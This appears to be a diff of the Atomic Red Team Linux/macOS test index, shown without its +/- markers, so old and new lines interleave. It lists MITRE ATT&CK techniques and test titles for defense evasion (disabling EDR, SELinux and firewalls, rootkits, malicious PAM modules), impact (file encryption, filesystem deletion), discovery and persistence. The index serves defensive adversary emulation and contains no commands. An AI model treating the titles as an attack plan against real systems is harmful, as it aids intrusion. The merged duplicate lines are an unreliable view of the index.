- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1578.003 Delete Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
- Atomic Test #3: Base64 decoding with Python [linux, macos]
- Atomic Test #4: Base64 decoding with Perl [linux, macos]
- Atomic Test #5: Base64 decoding with shell utilities [linux, macos]
- Atomic Test #6: Hex decoding with shell utilities [linux, macos]
- T1610 Deploy Container [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.008 Disable Cloud Logs](../../T1562.008/T1562.008.md)
- Atomic Test #1: AWS CloudTrail Changes [iaas:aws]
- Atomic Test #2: Azure - Eventhub Deletion [iaas:azure]
- Atomic Test #3: Office 365 - Exchange Audit Log Disabled [office-365]
- T1600.002 Disable Crypto Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.007 Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1027.004 Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1578.002 Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1578.001 Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1578.003 Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1140 Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1562.007 Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
- Atomic Test #7: Stop/Start UFW firewall [linux]
- Atomic Test #8: Stop/Start UFW firewall systemctl [linux]
- Atomic Test #9: Turn off UFW logging [linux]
- Atomic Test #10: Add and delete UFW firewall rules [linux]
- Atomic Test #11: Edit UFW firewall user.rules file [linux]
- Atomic Test #12: Edit UFW firewall ufw.conf file [linux]
- Atomic Test #13: Edit UFW firewall sysctl.conf file [linux]
- Atomic Test #14: Edit UFW firewall main configuration file [linux]
- Atomic Test #15: Tail the UFW firewall log file [linux]
- Atomic Test #1: Disable iptables firewall [linux]
- [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md)
- Atomic Test #1: Disable syslog [linux]
- Atomic Test #2: Disable Cb Response [linux]
- Atomic Test #3: Disable SELinux [linux]
- Atomic Test #4: Stop Crowdstrike Falcon on Linux [linux]
- Atomic Test #25: office-365-Disable-AntiPhishRule [office-365]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1484.002 Domain Trust Modification](../../T1484.002/T1484.002.md)
- Atomic Test #1: Add Federation to Azure AD [azure-ad]
- T1562.010 Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1601.002 Downgrade System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.006 Dynamic Linker Hijacking](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1070.004 File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #1: Delete a single file - Linux/macOS [linux, macos]
- Atomic Test #2: Delete an entire folder - Linux/macOS [linux, macos]
- Atomic Test #3: Overwrite and delete a file with shred [linux]
- Atomic Test #8: Delete Filesystem - Linux [linux]
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.001 Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.003 Impair Command History Logging](../../T1562.003/T1562.003.md)
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1562.003 HISTCONTROL](../../T1562.003/T1562.003.md)
- Atomic Test #1: Disable history collection [linux, macos]
- Atomic Test #2: Mac HISTCONTROL [macos, linux]
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1564.001 Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1562.006 Indicator Blocking](../../T1562.006/T1562.006.md)
- Atomic Test #1: Auditing Configuration Changes on Linux Host [linux]
- Atomic Test #2: Logging Configuration Changes on Linux Host [linux]
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- Atomic Test #2: Lgging Configuration Changes on Linux Host [linux]
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1553.004 Install Root Certificate](../../T1553.004/T1553.004.md)
- Atomic Test #1: Install root CA on CentOS/RHEL [linux]
- Atomic Test #2: Install root CA on Debian/Ubuntu [linux]
- [T1574.006 LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- [T1222.002 Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md)
- Atomic Test #1: chmod - Change file or folder mode (numeric mode) [macos, linux]
- Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [macos, linux]
@@ -287,106 +215,84 @@
- Atomic Test #7: chown - Change file or folder mode ownership only [macos, linux]
- Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux]
- Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.004 Masquerade Task or Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036 Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1599.001 Network Address Translation Traversal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1599 Network Boundary Bridging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.004 Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036 Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
- T1601.001 Patch System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.003 Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM module [linux]
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1600.001 Reduce Key Space [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1620 Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1036.003 Rename System Utilities](../../T1036.003/T1036.003.md)
- Atomic Test #2: Masquerading as Linux crond process. [linux]
- T1578.004 Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1578.004 Revert Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1014 Rootkit](../../T1014/T1014.md)
- Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
- Atomic Test #3: Set a SetGID flag on file [macos, linux]
- Atomic Test #4: Make and modify capabilities of a binary [linux]
- Atomic Test #5: Provide the SetUID capability to a file [linux]
- [T1036.006 Space after Filename](../../T1036.006/T1036.006.md)
- Atomic Test #2: Space After Filename [macos, linux]
- T1027.003 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.006 Space after Filename [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1027.003 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1548.003 Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- [T1497.001 System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1070.006 Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #1: Set a file's access timestamp [linux, macos]
- Atomic Test #2: Set a file's modification timestamp [linux, macos]
- Atomic Test #3: Set a file's creation timestamp [linux, macos]
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1600 Weaken Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# impact
- T1531 Account Access Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1531 Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1485 Data Destruction](../../T1485/T1485.md)
- Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos]
- [T1486 Data Encrypted for Impact](../../T1486/T1486.md)
- Atomic Test #1: Encrypt files using gpg (Linux) [linux]
- Atomic Test #2: Encrypt files using 7z (Linux) [linux]
- Atomic Test #3: Encrypt files using ccrypt (Linux) [linux]
- Atomic Test #4: Encrypt files using openssl (Linux) [linux]
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1561.002 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1561 Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491.002 External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491.001 Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.001 OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1561.002 Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1561 Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491.002 External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491.001 Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499.001 OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1496 Resource Hijacking](../../T1496/T1496.md)
- Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux]
- T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1489 Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #3: Restart System via `shutdown` - macOS/Linux [macos, linux]
- Atomic Test #4: Shutdown System via `shutdown` - macOS/Linux [macos, linux]
@@ -395,28 +301,24 @@
- Atomic Test #7: Reboot System via `halt` - Linux [linux]
- Atomic Test #8: Shutdown System via `poweroff` - Linux [linux]
- Atomic Test #9: Reboot System via `poweroff` - Linux [linux]
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# discovery
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087 Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
- Atomic Test #1: List Mozilla Firefox Bookmark Database Files on Linux [linux]
- T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1580 Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1526 Cloud Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1619 Cloud Storage Object Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1613 Container and Resource Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.002 Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069.002 Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.004 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1526 Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1087.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1069.002 Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1087.003 Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
- Atomic Test #3: Nix File and Directory Discovery [macos, linux]
- Atomic Test #3: Nix File and Diectory Discovery [macos, linux]
- Atomic Test #4: Nix File and Directory Discovery 2 [macos, linux]
- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1087.001 Local Account](../../T1087.001/T1087.001.md)
- Atomic Test #1: Enumerate all accounts (Local) [linux]
- Atomic Test #1: Enumerate all accounts (Local) [linux, macos]
- Atomic Test #2: View sudoers access [linux, macos]
- Atomic Test #3: View accounts with UID 0 [linux, macos]
- Atomic Test #4: List opened files by user [linux, macos]
@@ -428,7 +330,7 @@
- Atomic Test #1: Port Scan [linux, macos]
- Atomic Test #2: Port Scan Nmap [linux, macos]
- [T1135 Network Share Discovery](../../T1135/T1135.md)
- Atomic Test #2: Network Share Discovery - linux [linux]
- Atomic Test #1: Network Share Discovery [macos, linux]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux [linux]
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
@@ -436,18 +338,15 @@
- Atomic Test #2: Examine password complexity policy - CentOS/RHEL 7.x [linux]
- Atomic Test #3: Examine password complexity policy - CentOS/RHEL 6.x [linux]
- Atomic Test #4: Examine password expiration policy - All Linux [linux]
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1057 Process Discovery](../../T1057/T1057.md)
- Atomic Test #1: Process Discovery - ps [macos, linux]
- [T1018 Remote System Discovery](../../T1018/T1018.md)
- Atomic Test #6: Remote System Discovery - arp nix [linux, macos]
- Atomic Test #7: Remote System Discovery - sweep [linux, macos]
- Atomic Test #12: Remote System Discovery - ip neighbour [linux]
- Atomic Test #13: Remote System Discovery - ip route [linux]
- Atomic Test #14: Remote System Discovery - ip tcp_metrics [linux]
- [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
- Atomic Test #4: Security Software Discovery - ps (Linux) [linux]
- T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1518 Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1497.001 System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
- [T1082 System Information Discovery](../../T1082/T1082.md)
@@ -455,232 +354,49 @@
- Atomic Test #4: Linux VM Check via Hardware [linux]
- Atomic Test #5: Linux VM Check via Kernel Modules [linux]
- Atomic Test #7: Hostname Discovery [linux, macos]
- Atomic Test #11: Environment variables discovery on macos and linux [macos, linux]
- T1614.001 System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1016 System Network Configuration Discovery](../../T1016/T1016.md)
- Atomic Test #3: System Network Configuration Discovery [macos, linux]
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
- Atomic Test #3: System Network Connections Discovery Linux & MacOS [linux, macos]
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
- Atomic Test #2: System Owner/User Discovery [linux, macos]
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# persistence
- [T1098 Account Manipulation](../../T1098/T1098.md)
- Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
- Atomic Test #4: Azure - adding user to Azure AD role [azure-ad]
- Atomic Test #5: Azure - adding service principal to Azure AD role [azure-ad]
- Atomic Test #6: Azure - adding user to Azure role in subscription [iaas:azure]
- Atomic Test #7: Azure - adding service principal to Azure role in subscription [iaas:azure]
- Atomic Test #8: AzureAD - adding permission to application [azure-ad]
- T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.006 Add-ins [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md)
- Atomic Test #1: Azure AD Application Hijacking - Service Principal [azure-ad]
- Atomic Test #2: Azure AD Application Hijacking - App Registration [azure-ad]
- Atomic Test #3: AWS - Create Access Key and Secret Key [iaas:aws]
- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md)
